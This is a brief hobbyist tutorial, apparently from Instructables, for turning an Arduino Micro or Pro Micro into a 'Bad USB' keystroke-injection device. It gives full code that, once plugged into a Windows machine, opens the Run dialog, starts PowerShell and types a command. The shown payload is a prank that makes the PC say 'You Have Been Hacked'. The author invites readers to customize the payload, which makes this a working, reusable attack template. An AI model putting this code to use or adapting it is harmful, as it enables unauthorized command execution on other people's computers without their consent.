Bad USB With Arduino Micro/Pro Micro!

by Portal6910 in Circuits > Arduino

7 Views, 0 Favorites, 0 Comments

Bad USB With Arduino Micro/Pro Micro!

indir.jpg

Hi! We're Making A Bad USB Now, Why Don't You Join Us?

Supplies

WhatsApp Görsel 2025-06-15 saat 19.41.29_310132a9.jpg

Version 1:

  1. Arduino Micro/Pro Micro
  2. USB To Micro USB Cable / Male USB To Male Micro USB Adaptor

Version 2:

  1. Coming Soon...

Arduino IDE

WhatsApp Görsel 2025-06-15 saat 19.41.29_0bdc2e22.jpg
Ekran görüntüsü 2025-06-15 193114.png

Connect The Arduino Micro/Pro Micro With Cable Or Adaptor.

If You Using Arduino Micro, Select Arduino Micro On Board.

If You Using Arduino Pro Micro, Select Arduino Leonardo On Board.

And Install The "Keyboard" Library.

The Code

The Full Code Is Here, But Please Contiune Reading Steps.


#include <Keyboard.h>

// The Powershell Code
String sayHacked = "Add-Type -AssemblyName System.speech;$TTS = New-Object -TypeName System.Speech.Synthesis.SpeechSynthesizer;$TTS.Speak('You Have Been Hacked');";

void setup() {
// The Setup Code For Get Ready Library
Keyboard.begin();
WindowsAttack();
}

void loop() {
// Nothing Happening Here
}

void WindowsAttack() {
// It Is The Main Code, It Opens The Powershell And Writes sayHacked Variable
delay(100);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(100);
Keyboard.releaseAll();

delay(500);
Keyboard.println("powershell");

delay(100);
Keyboard.println(sayHacked);
}

Customizing

I Added Comments. You Can Read These Comments And Customize Your Code.

Bye :)